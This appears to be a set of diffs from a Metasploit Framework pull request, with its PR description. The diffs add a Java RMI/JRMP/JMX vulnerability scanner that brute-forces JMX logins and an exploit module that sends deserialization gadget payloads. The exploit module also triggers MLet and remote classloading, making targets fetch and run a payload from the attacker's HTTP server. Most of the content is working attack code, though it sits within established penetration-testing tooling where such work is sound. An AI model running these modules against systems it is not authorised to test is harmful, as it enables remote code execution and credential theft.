           send(2, 1, 17777547820122932803, [
-            Rex::Java::Serialization::Metamodel::JavaArray.new('Ljava/rmi/server/ObjID;', []), 
-            Rex::Java::Serialization::Metamodel::JavaLong.new(0), 
+            Rex::Java::Serialization::Metamodel::JavaArray.new('Ljava/rmi/server/ObjID;', []),
+            Rex::Java::Serialization::Metamodel::JavaLong.new(0),
             url])
 
         rescue Rex::Java::JRMP::JRMPError => e
@@ -426,7 +424,7 @@ module Msf
             Util.okay 'DGC filters parameter types'
           elsif type == 'java.lang.ClassCastException'
             Util.vuln 'DGC does not filter parameters'
-            vectors += run_dgc_deser if @rc.tryDeser?
+            vectors += run_dgc_deser if @rc.try_deser?
           else
             Util.error 'DGC dirty failed: ' + type
           end
@@ -436,7 +434,7 @@ module Msf
 
       def run_dgc_deser
         vectors = []
-        ctx = Rex::Java::Serialization::Probe::BuiltinProbes.new.create_context(@reg, 
+        ctx = Rex::Java::Serialization::Probe::BuiltinProbes.new.create_context(@reg,
                                                                                 params: {
           'objid' => 2,
           'methodid' => 1,
@@ -456,14 +454,14 @@ module Msf
             Rex::Java::Serialization::Metamodel::JavaLong.new(0),
             nil
           ]
-          vectors.push(RMICallDeserVector.new(@host, 
-                                              @port, 
+          vectors.push(RMICallDeserVector.new(@host,
+                                              @port,
                                               2,
-                                              methodId: 1, 
-                                              methodHash: 17777547820122932803, 
+                                              methodId: 1,
+                                              methodHash: 17777547820122932803,
                                               ssl: @ssl,
                                               baseargs: args,
-                                              argidx: 2, 
+                                              argidx: 2,
                                               ctx: ctx))
         end
         vectors

--- a/lib/msf/core/exploit/java/serialized/rmi/runner.rb
+++ b/lib/msf/core/exploit/java/serialized/rmi/runner.rb
@@ -23,47 +23,51 @@ module Msf
         @reg.load('model/rmi.json')
       end
 
+
+      def check_referenced_objects(foundobjects)
+        vectors = []
+        Util.info 'Found ' + foundobjects.length.to_s + ' referenced objects, following references'
+        foundobjects.each do |name, obj|
+          unless @rc.followRemoteRefs?
+            if obj['host'] != @host && !obj['host'].start_with?('127.')
+              Util.info 'Skipping possibly remote object ' + name + ' pointing to ' + obj['host']
+              return
+            end
+          end
+
+          if name == 'jmxrmi'
+            prober = JMXProber.new(name, obj, @reg, @host, jmxcreds: @jmxcreds, rc: @rc)
+            @jmxprober = prober
+          else
+            Util.info 'Custom object found ' + name
+            prober = ReferenceProber.new(name, obj, @reg, @host, rc: @rc)
+          end
+
+          begin
+            v = prober.run
+            vectors += v unless v.nil?
+          rescue Rex::Java::JRMP::JRMPError => e
+            root = Rex::Java::JRMP::Util.unwrap_exception(e.ex)
+            Util.error 'Probe failed: ' + root.to_s
+            Util.error e.ex.to_s
+          rescue ::Exception => e
+            Util.error 'Probe failed: ' + e.to_s
+            prober.close
+            raise
+          end
+          prober.close
+        end
+        vectors
+      end
+
       def run
         prober = RMIProber.new(@host, @port, @reg, ssl: @ssl, rc: @rc)
         vectors = prober.run
+        foundobjects = prober.objects
 
-        if @rc.checkRefs?
-          foundobjects = prober.objects
-          unless foundobjects.empty?
-            Util.info 'Found ' + foundobjects.length.to_s + ' referenced objects, following references'
-
-            foundobjects.each do |name, obj|
-              unless @rc.followRemoteRefs?
-                if obj['host'] != @host && !obj['host'].start_with?('127.')
-                  Util.info 'Skipping possibly remote object ' + name + ' pointing to ' + obj['host']
-                  return
-                end
-              end
-
-              if name == 'jmxrmi'
-                prober = JMXProber.new(name, obj, @reg, @host, jmxcreds: @jmxcreds, rc: @rc)
-                @jmxprober = prober
-              else
-                Util.info 'Custom object found ' + name
-                prober = ReferenceProber.new(name, obj, @reg, @host, rc: @rc)
-              end
-
-              begin
-                v = prober.run
-                vectors += v unless v.nil?
-              rescue Rex::Java::JRMP::JRMPError => e
-                root = Rex::Java::JRMP::Util.unwrap_exception(e.ex)
-                Util.error 'Probe failed: ' + root.to_s
-                Util.error e.ex.to_s
-              rescue ::Exception => e
-                Util.error 'Probe failed: ' + e.to_s
-                prober.close
-                raise
-              end
-              prober.close
-            end
-          end
-          end
+        if @rc.checkRefs? and !foundobjects.empty?
+          vectors.push(*check_referenced_objects(foundobjects))
+        end
 
         dedupvecs = []
         dedup = Set[]
@@ -82,5 +86,5 @@ module Msf
         dedupvecs
       end
     end
-    end
+  end
 end

--- a/lib/msf/core/exploit/java/serialized/rmi/runner.rb
+++ b/lib/msf/core/exploit/java/serialized/rmi/runner.rb
@@ -30,7 +30,7 @@ module Msf
         foundobjects.each do |name, obj|
           unless @rc.followRemoteRefs?
             if obj['host'] != @host && !obj['host'].start_with?('127.')
-              Util.info 'Skipping possibly remote object ' + name + ' pointing to ' + obj['host']
+              Util.info 'Skipping possibly remote object ' + name + ' pointing to ' + obj['host'] + ":" + obj['port']
               return
             end
           end

--- a/lib/msf/core/exploit/java/serialized/rmi/runner.rb
+++ b/lib/msf/core/exploit/java/serialized/rmi/runner.rb
@@ -1,0 +1,86 @@
+# -*- coding: binary -*-
+
+module Msf
+  module Exploit::Java::Serialized::RMI
+
+    class RMICheck
+      attr_reader :jmxprober
+
+      def initialize(host, port, ssl: false, username: nil, password: nil, rc: RunConfig.new)
+        @host = host
+        @port = port
+        @ssl = ssl
+        @jmxcreds = nil
+        if !username.nil? && !password.nil?
+          @jmxcreds = Rex::Java::Serialization::Metamodel::JavaArray.new('Ljava/lang/String;', 
+                                                                         %w[test test])
+        end
+
+        @rc = rc
+
+        @reg = Rex::Java::Serialization::Metamodel::Registry.new()
+        @reg.load('model/base-java9.json')
+        @reg.load('model/rmi.json')
+      end
+
+      def run
+        prober = RMIProber.new(@host, @port, @reg, ssl: @ssl, rc: @rc)
+        vectors = prober.run
+
+        if @rc.checkRefs?
+          foundobjects = prober.objects
+          unless foundobjects.empty?
+            Util.info 'Found ' + foundobjects.length.to_s + ' referenced objects, following references'
+
+            foundobjects.each do |name, obj|
+              unless @rc.followRemoteRefs?
+                if obj['host'] != @host && !obj['host'].start_with?('127.')
+                  Util.info 'Skipping possibly remote object ' + name + ' pointing to ' + obj['host']
+                  return
+                end
+              end
+
+              if name == 'jmxrmi'
+                prober = JMXProber.new(name, obj, @reg, @host, jmxcreds: @jmxcreds, rc: @rc)
+                @jmxprober = prober
+              else
+                Util.info 'Custom object found ' + name
+                prober = ReferenceProber.new(name, obj, @reg, @host, rc: @rc)
+              end
+
+              begin
+                v = prober.run
+                vectors += v unless v.nil?
+              rescue Rex::Java::JRMP::JRMPError => e
+                root = Rex::Java::JRMP::Util.unwrap_exception(e.ex)
+                Util.error 'Probe failed: ' + root.to_s
+                Util.error e.ex.to_s
+              rescue ::Exception => e
+                Util.error 'Probe failed: ' + e.to_s
+                prober.close
+                raise
+              end
+              prober.close
+            end
+          end
+          end
+
+        dedupvecs = []
+        dedup = Set[]
+        gadgets = Set[]
+        vectors.sort { |a, b| a.prio - b.prio }.each do |vector|
+          i = vector.id
+          if !dedup.include?(i)
+            dedup.add(i)
+          else
+            next
+          end
+          gadgets += vector.context.gadgets if vector.respond_to?('context')
+          dedupvecs.push(vector)
+        end
+        Util.info format('Identified %d attack vector(s), gadgets %s', dedupvecs.length, gadgets.to_a.to_s)
+        dedupvecs
+      end
+    end
+    end
+end

--- a/lib/msf/core/exploit/java/serialized/rmi/runner.rb
+++ b/lib/msf/core/exploit/java/serialized/rmi/runner.rb
@@ -12,7 +12,7 @@ module Msf
         @ssl = ssl
         @jmxcreds = nil
         if !username.nil? && !password.nil?
-          @jmxcreds = Rex::Java::Serialization::Metamodel::JavaArray.new('Ljava/lang/String;', 
+          @jmxcreds = Rex::Java::Serialization::Metamodel::JavaArray.new('Ljava/lang/String;',
                                                                          %w[test test])
         end
 
@@ -28,7 +28,7 @@ module Msf
         vectors = []
         Util.info 'Found ' + foundobjects.length.to_s + ' referenced objects, following references'
         foundobjects.each do |name, obj|
-          unless @rc.followRemoteRefs?
+          unless @rc.follow_remote_refs?
             if obj['host'] != @host && !obj['host'].start_with?('127.')
               Util.info 'Skipping possibly remote object ' + name + ' pointing to ' + obj['host'] + ":" + obj['port']
               return
@@ -65,7 +65,7 @@ module Msf
         vectors = prober.run
         foundobjects = prober.objects
 
-        if @rc.checkRefs? and !foundobjects.empty?
+        if @rc.check_refs? and !foundobjects.empty?
           vectors.push(*check_referenced_objects(foundobjects))
         end
 

--- a/lib/msf/core/exploit/java/serialized/rmi/runner.rb
+++ b/lib/msf/core/exploit/java/serialized/rmi/runner.rb
@@ -15,7 +15,7 @@ module Msf
           @jmxcreds = Rex::Java::Serialization::Metamodel::JavaArray.new('Ljava/lang/String;',
                                                                          %w[test test])
         end
-
+  
         @rc = rc
 
         @reg = Rex::Java::Serialization::Metamodel::Registry.new()
@@ -30,7 +30,7 @@ module Msf
         foundobjects.each do |name, obj|
           unless @rc.follow_remote_refs?
             if obj['host'] != @host && !obj['host'].start_with?('127.')
-              Util.info 'Skipping possibly remote object ' + name + ' pointing to ' + obj['host'] + ":" + obj['port']
+              Util.info 'Skipping possibly remote object ' + name + ' pointing to ' + obj['host'] + ":" + obj['port'].to_s
               return
             end
           end
@@ -40,7 +40,7 @@ module Msf
             @jmxprober = prober
           else
             Util.info 'Custom object found ' + name
-            prober = ReferenceProber.new(name, obj, @reg, @host, rc: @rc)
+            prober = ReferenceProber.new(name, obj, @reg, @host, @rc)
           end
 
           begin

--- a/modules/auxiliary/scanner/java/rmi_scanner.rb
+++ b/modules/auxiliary/scanner/java/rmi_scanner.rb
@@ -1,4 +1,3 @@
-require 'msf/core'
 require 'msf/core/exploit/java/serialized'
 require 'msf/core/exploit/java/serialized/rmi'
 require 'metasploit/framework/credential_collection'
@@ -15,9 +14,17 @@ class MetasploitModule < Msf::Auxiliary
       'Name'        => 'JRMP/RMI/JMX Vulnerabilitiy Scanner',
       'Description' =>
       'Detects various vulnerabilites regaring JRMP/RMI/JMX protocol use,
-      including remote classloading, MLET loading and deserialization 
+      including remote classloading, MLET loading and deserialization
       vulnerabilities. Also acts as a login scanner for JMX endpoints.',
-      'Author'      => 'mbechler'
+      'Author'      => 'mbechler',
+      'References'     =>
+      [
+        ['CVE', '2011-3556'],
+        ['CVE', '2015-2342'],
+        ['CVE', '2017-3241'],
+        ['CVE', '2017-3241'],
+        ['CVE', '2018-2637']
+      ]
     )
 
     register_options(

--- a/modules/auxiliary/scanner/java/rmi_scanner.rb
+++ b/modules/auxiliary/scanner/java/rmi_scanner.rb
@@ -1,0 +1,100 @@
+require 'msf/core'
+require 'msf/core/exploit/java/serialized'
+require 'msf/core/exploit/java/serialized/rmi'
+require 'metasploit/framework/credential_collection'
+
+class MetasploitModule < Msf::Auxiliary
+  include Msf::Auxiliary::Scanner
+  include Msf::Auxiliary::Report
+  include Msf::Auxiliary::AuthBrute
+
+  include Msf::Exploit::Java::Serialized::RMI
+
+  def initialize
+    super(
+      'Name'        => 'JRMP/RMI/JMX Vulnerabilitiy Scanner',
+      'Description' =>
+      'Detects various vulnerabilites regaring JRMP/RMI/JMX protocol use,
+      including remote classloading, MLET loading and deserialization 
+      vulnerabilities. Also acts as a login scanner for JMX endpoints.',
+      'Author'      => 'mbechler'
+    )
+
+    register_options(
+      [
+        Opt::RPORT(1099),
+        OptBool.new('SSL', [true, 'Connect using SSL', false]),
+        OptBool.new('CHECK_REFS', [true, 'Check objects referenced in registry', true]),
+        OptBool.new('FOLLOW_REMOTE_REFS', [true, 'Follow remote references that could point to other systems', false]),
+        OptBool.new('TRY_DESER', [true, 'Try exploit deserialization', true]),
+        OptBool.new('TRY_MLET', [true, 'Try exploit MLet loading (disabled by default as this leaves objects around)', false]),
+        OptBool.new('TRY_CLASSLOAD', [true, 'Try exploit remote location classloading', true]),
+        OptString.new('USERNAME', [false, 'JMX username']),
+        OptString.new('PASSWORD', [false, 'JMX password']),
+        OptInt.new('METHOD_ID', [false, 'Method ID for testing custom legacy objects', -1]),
+        OptInt.new('METHOD_HASH', [false, 'Method Hash for testing custom objects']),
+        OptString.new('METHOD_SIGNATURE', [false, 'Method signature for testing custom objects (Format: <methodName> + <internalJavaSignature>, for example test(Ljava/lang/String;)Lmy/return/Type;'])
+      ]
+    )
+  end
+
+  def run_host(host)
+    config = Msf::Exploit::Java::Serialized::RMI::PropRunConfig.new(datastore)
+    check = Msf::Exploit::Java::Serialized::RMI::RMICheck.new(host,
+                                       datastore['RPORT'],
+                                       ssl: datastore['SSL'],
+                                       username: datastore['USERNAME'],
+                                       password: datastore['PASSWORD'],
+                                       rc: config)
+
+    begin
+      check.run
+    rescue ::Interrupt
+      raise $ERROR_INFO
+    rescue ::Errno::ECONNREFUSED
+    end
+
+    return if check.jmxprober.nil? || !check.jmxprober.auth
+
+    print_status 'Seems to require authentication'
+
+    cred_collection = Metasploit::Framework::CredentialCollection.new(
+      blank_passwords: datastore['BLANK_PASSWORDS'],
+      pass_file: datastore['PASS_FILE'],
+      password: datastore['PASSWORD'],
+      user_file: datastore['USER_FILE'],
+      userpass_file: datastore['USERPASS_FILE'],
+      username: datastore['USERNAME'],
+      user_as_pass: datastore['USER_AS_PASS']
+    )
+
+    rport = datastore['RPORT']
+    cred_collection = prepend_db_passwords(cred_collection)
+
+    cred_collection.each do |cred|
+      user = cred.public
+      pass = cred.private
+      if check.jmxprober.trylogin(user, pass)
+        print_good "#{host}:#{rport} - LOGIN SUCCESSFUL: #{cred}"
+        core = store_valid_credential(
+          service_data: {
+            origin_type: :service,
+            protocol: 'tcp',
+            service_name: 'jmxrmi',
+            address: host,
+            port: rport
+          },
+          private_type: :password,
+          user: user,
+          private: pass
+        )
+        break if datastore['STOP_ON_SUCCESS']
+      else
+        #             invalidate_login(cred)
+        if datastore['VERBOSE']
+          print_status "#{host}:#{rport} - LOGIN FAILED: #{cred}"
+        end
+      end
+    end
+  end
+end

--- a/modules/auxiliary/scanner/java/rmi_scanner.rb
+++ b/modules/auxiliary/scanner/java/rmi_scanner.rb
@@ -74,27 +74,24 @@ class MetasploitModule < Msf::Auxiliary
     cred_collection.each do |cred|
       user = cred.public
       pass = cred.private
-      if check.jmxprober.trylogin(user, pass)
-        print_good "#{host}:#{rport} - LOGIN SUCCESSFUL: #{cred}"
-        core = store_valid_credential(
-          service_data: {
-            origin_type: :service,
-            protocol: 'tcp',
-            service_name: 'jmxrmi',
-            address: host,
-            port: rport
-          },
-          private_type: :password,
-          user: user,
-          private: pass
-        )
-        break if datastore['STOP_ON_SUCCESS']
-      else
-        #             invalidate_login(cred)
-        if datastore['VERBOSE']
-          print_status "#{host}:#{rport} - LOGIN FAILED: #{cred}"
-        end
+      unless check.jmxprober.trylogin(user, pass)
+        vprint_status "#{host}:#{rport} - LOGIN FAILED: #{cred}"
+        next
       end
+      print_good "#{host}:#{rport} - LOGIN SUCCESSFUL: #{cred}"
+      core = store_valid_credential(
+        service_data: {
+          origin_type: :service,
+          protocol: 'tcp',
+          service_name: 'jmxrmi',
+          address: host,
+          port: rport
+        },
+        private_type: :password,
+        user: user,
+        private: pass
+      )
+      break if datastore['STOP_ON_SUCCESS']
     end
   end
 end

--- a/modules/exploits/multi/java/rmi_server.rb
+++ b/modules/exploits/multi/java/rmi_server.rb
@@ -1,0 +1,152 @@
+require 'msf/core'
+require 'msf/core/exploit/java/serialized'
+require 'msf/core/exploit/java/serialized/rmi'
+require 'rex/java/jrmp'
+
+class MetasploitModule < Msf::Exploit::Remote
+  Rank = NormalRanking
+
+  include Msf::Exploit::Java::Serialized
+  include Msf::Exploit::Java::Serialized::RMI
+
+  def initialize(info = {})
+    super(
+      update_info(
+        info,
+        'Name'           => 'Universal JRMP/RMI/JMX Exploit',
+        'Description'    => 'Module for exploiting various JRMP/RMI/JMX vulerabilities,
+                            including MLet loading, deserialization attacks and remote codebase loading.',
+        'Author'         => ['mbechler'],
+        'References'     =>
+          [
+          ],
+        'Platform' => %w[java],
+        'Arch' => [ARCH_CMD, ARCH_JAVA],
+        'Targets'        =>
+          [
+            ['Generic', {
+              'Arch' => ARCH_JAVA
+            }]
+          ],
+        'DefaultTarget'  => 0
+      )
+    )
+
+    register_options(
+      [
+        Opt::RHOST(),
+        Opt::RPORT(1099),
+        OptBool.new('SSL', [true, 'Connect using SSL', false]),
+        OptBool.new('CHECK_REFS', [true, 'Check objects referenced in registry', true]),
+        OptBool.new('FOLLOW_REMOTE_REFS', [true, 'Follow remote references that could point to other systems', false]),
+        OptBool.new('TRY_DESER', [true, 'Try exploit deserialization', true]),
+        OptBool.new('TRY_MLET', [true, 'Try exploit MLet loading', true]),
+        OptBool.new('TRY_CLASSLOAD', [true, 'Try exploit remote location classloading', true]),
+        OptString.new('USERNAME', [false, 'JMX username']),
+        OptString.new('PASSWORD', [false, 'JMX password']),
+
+        OptInt.new('METHOD_ID', [false, 'Method ID for testing custom legacy objects', -1]),
+        OptInt.new('METHOD_HASH', [false, 'Method Hash for testing custom objects']),
+        OptString.new('METHOD_SIGNATURE', [false, 'Method signature for testing custom objects (Format: <methodName> + <internalJavaSignature>, for example test(Ljava/lang/String;)Lmy/return/Type;'])
+      ]
+    )
+  end
+
+  def create_config(datastore)
+    Msf::Exploit::Java::Serialized::RMI::PropRunConfig.new(datastore)
+  end
+
+  def collect
+    check = Msf::Exploit::Java::Serialized::RMI::RMICheck.new(datastore['RHOST'],
+                                       datastore['RPORT'],
+                                       ssl: datastore['SSL'],
+                                       username: datastore['USERNAME'],
+                                       password: datastore['PASSWORD'],
+                                       rc: create_config(datastore))
+    
+    begin
+      check.run
+    rescue Rex::Java::JRMP::JRMPError => e
+      root = Rex::Java::JRMP::Util.unwrap_exception(e.ex)
+      print_status 'Check returned error: ' + root[0][0] + ':' + root[1]['detailMessage']
+    end
+  end
+
+
+  def do_exploit(vector)
+    if vector.id[0] == 'mlet'
+      print_status 'Trying MLET loading'
+      begin
+        vector.deliver(get_uri + '/mlet')
+        return
+      rescue Rex::Java::JRMP::JRMPError => e
+        root = Rex::Java::JRMP::Util.unwrap_exception(e.ex)
+        print_status 'MLet load returned error' + root[0][0] + ':' + root[1]['detailMessage']
+      rescue Timeout::Error
+        return if session_created?
+        raise
+      end
+      return
+    elsif vector.id[0] == 'classload'
+      info 'Trying to invoke remote classloading'
+      begin
+        vector.deliver([get_uri + '/', 'metasploit.StaticPayload'])
+        return
+      rescue Rex::Java::JRMP::JRMPError => e
+        root = Rex::Java::JRMP::Util.unwrap_exception(e.ex)
+        print_status 'Load returned error: ' + root[0][0] + ':' + root[1]['detailMessage']
+      rescue Timeout::Error
+        return if session_created?
+        raise
+      end
+      return
+    elsif !vector.respond_to?('context')
+      info 'Unsupported vector'
+      return
+    end
+
+    payloads(vector.context) do |payl|
+      begin
+        vector.deliver(payl)
+      rescue Rex::Java::JRMP::JRMPError => e
+        root = Rex::Java::JRMP::Util.unwrap_exception(e.ex)
+        type = root[0][0]
+        msg = root[1].fetch('detailMessage', nil)
+        if !msg.nil?
+          print_status 'Call returned error, this does not necessarily mean that the exploit failed: ' + type + ':' + msg
+          print_status root.to_s if datastore['VERBOSE']
+        else
+          print_status 'Call returned error, this does not necessarily mean that the exploit failed: ' + type
+          print_status root.to_s if datastore['VERBOSE']
+        end
+      end
+    end
+  end
+
+
+  def extra_http_classes
+    paths = super
+    paths.push ['metasploit/JMXPayloadMBean.class']
+    paths.push ['metasploit/JMXPayload.class']
+    paths
+  end
+
+  def on_request_uri(cli, request)
+    jar = get_jar
+    if request.uri =~ /mlet$/
+      jarname = "#{rand_text_alpha(8 + rand(8))}.jar"
+
+      mlet = "<HTML><mlet code=\"#{jar.substitutions["metasploit"]}.JMXPayload\" "
+      mlet << "archive=\"#{jarname}\" "
+      mlet << "name=\"#{@mlet}:name=jmxpayload,id=#{rand_text_alpha(8 + rand(8))}\" "
+      mlet << "codebase=\"#{get_uri}\"></mlet></HTML>"
+      send_response(cli, mlet,
+                    'Content-Type' => 'application/octet-stream',
+                    'Pragma'       => 'no-cache')
+
+      print_status('Replied to request for mlet')
+    else
+      super
+    end
+  end
+end

--- a/modules/exploits/multi/java/rmi_server.rb
+++ b/modules/exploits/multi/java/rmi_server.rb
@@ -34,7 +34,6 @@ class MetasploitModule < Msf::Exploit::Remote
 
     register_options(
       [
-        Opt::RHOST(),
         Opt::RPORT(1099),
         OptBool.new('SSL', [true, 'Connect using SSL', false]),
         OptBool.new('CHECK_REFS', [true, 'Check objects referenced in registry', true]),
@@ -81,20 +80,20 @@ class MetasploitModule < Msf::Exploit::Remote
         return
       rescue Rex::Java::JRMP::JRMPError => e
         root = Rex::Java::JRMP::Util.unwrap_exception(e.ex)
-        print_status 'MLet load returned error' + root[0][0] + ':' + root[1]['detailMessage']
+        print_status "MLet load returned error #{root[0][0]}: #{root[1]['detailMessage']}"
       rescue Timeout::Error
         return if session_created?
         raise
       end
       return
     elsif vector.id[0] == 'classload'
-      info 'Trying to invoke remote classloading'
+      print_status 'Trying to invoke remote classloading'
       begin
         vector.deliver([get_uri + '/', 'metasploit.StaticPayload'])
         return
       rescue Rex::Java::JRMP::JRMPError => e
         root = Rex::Java::JRMP::Util.unwrap_exception(e.ex)
-        print_status 'Load returned error: ' + root[0][0] + ':' + root[1]['detailMessage']
+        print_status "Load returned error #{root[0][0]}: #{root[1]['detailMessage']}"
       rescue Timeout::Error
         return if session_created?
         raise
@@ -112,13 +111,8 @@ class MetasploitModule < Msf::Exploit::Remote
         root = Rex::Java::JRMP::Util.unwrap_exception(e.ex)
         type = root[0][0]
         msg = root[1].fetch('detailMessage', nil)
-        if !msg.nil?
-          print_status 'Call returned error, this does not necessarily mean that the exploit failed: ' + type + ':' + msg
-          print_status root.to_s if datastore['VERBOSE']
-        else
-          print_status 'Call returned error, this does not necessarily mean that the exploit failed: ' + type
-          print_status root.to_s if datastore['VERBOSE']
-        end
+        print_status "Call returned error, this does not necessarily mean that the exploit failed: #{type}: #{msg}"
+        vprint_status root.to_s
       end
     end
   end
@@ -134,11 +128,11 @@ class MetasploitModule < Msf::Exploit::Remote
   def on_request_uri(cli, request)
     jar = get_jar
     if request.uri =~ /mlet$/
-      jarname = "#{rand_text_alpha(8 + rand(8))}.jar"
+      jarname = "#{rand_text_alpha(8..16)}.jar"
 
       mlet = "<HTML><mlet code=\"#{jar.substitutions["metasploit"]}.JMXPayload\" "
       mlet << "archive=\"#{jarname}\" "
-      mlet << "name=\"#{@mlet}:name=jmxpayload,id=#{rand_text_alpha(8 + rand(8))}\" "
+      mlet << "name=\"#{@mlet}:name=jmxpayload,id=#{rand_text_alpha(8..16)}\" "
       mlet << "codebase=\"#{get_uri}\"></mlet></HTML>"
       send_response(cli, mlet,
                     'Content-Type' => 'application/octet-stream',

--- a/modules/exploits/multi/java/rmi_server.rb
+++ b/modules/exploits/multi/java/rmi_server.rb
@@ -16,6 +16,7 @@ class MetasploitModule < Msf::Exploit::Remote
         'Description'    => 'Module for exploiting various JRMP/RMI/JMX vulnerabilities,
                             including MLet loading, deserialization attacks and remote codebase loading.',
         'Author'         => ['mbechler'],
+        'DisclosureDate' => '2016-03-05',
         'References'     =>
           [
             ['CVE', '2011-3556'],
@@ -71,7 +72,7 @@ class MetasploitModule < Msf::Exploit::Remote
       check.run
     rescue Rex::Java::JRMP::JRMPError => e
       root = Rex::Java::JRMP::Util.unwrap_exception(e.ex)
-      print_status 'Check returned error: ' + root[0][0] + ':' + root[1]['detailMessage']
+      print_status "Check returned error #{root[0][0]}: #{root[1]['detailMessage']}"
     end
   end
 

--- a/modules/exploits/multi/java/rmi_server.rb
+++ b/modules/exploits/multi/java/rmi_server.rb
@@ -1,4 +1,3 @@
-require 'msf/core'
 require 'msf/core/exploit/java/serialized'
 require 'msf/core/exploit/java/serialized/rmi'
 require 'rex/java/jrmp'
@@ -14,11 +13,16 @@ class MetasploitModule < Msf::Exploit::Remote
       update_info(
         info,
         'Name'           => 'Universal JRMP/RMI/JMX Exploit',
-        'Description'    => 'Module for exploiting various JRMP/RMI/JMX vulerabilities,
+        'Description'    => 'Module for exploiting various JRMP/RMI/JMX vulnerabilities,
                             including MLet loading, deserialization attacks and remote codebase loading.',
         'Author'         => ['mbechler'],
         'References'     =>
           [
+            ['CVE', '2011-3556'],
+            ['CVE', '2015-2342'],
+            ['CVE', '2017-3241'],
+            ['CVE', '2017-3241'],
+            ['CVE', '2018-2637']
           ],
         'Platform' => %w[java],
         'Arch' => [ARCH_CMD, ARCH_JAVA],
@@ -62,7 +66,7 @@ class MetasploitModule < Msf::Exploit::Remote
                                        username: datastore['USERNAME'],
                                        password: datastore['PASSWORD'],
                                        rc: create_config(datastore))
-    
+
     begin
       check.run
     rescue Rex::Java::JRMP::JRMPError => e


### PR DESCRIPTION
Previous discussion in: https://github.com/rapid7/metasploit-framework/issues/11748
Opening this for further discussion.

Depends on: https://github.com/rapid7/metasploit-payloads/pull/369 and https://github.com/rapid7/rex-java/pull/1

Java RMI/JMX scanner and exploit modules. The implements checking and exploitation of various open deserialization vectors in JRMP/RMI/JMX services.  Also supported are the remote class- and MLET loading vulnerabilities for which other modules exist.

Some open questions/issues:
- Is there a preferred way of logging inside msf lib/ utility classes? I see a bunch of modules using print_status from the module, but that does not seem to work for me when using classes (maybe based on my lacking insight into ruby scoping rules).
- It's very common that the gadgets will fire multiple times and therefor multiple sessions will be established, it would seem to me that UUID tracking would be the preferred way to get rid of these, however I'm not sure how this needs to be set up in the module to work properly.
- The Translet loader patching could probably go into the metasploit-payloads gem, would that be preferred?
- I still have to add an appropriate loader for the remote classloading stuff to work again properly.

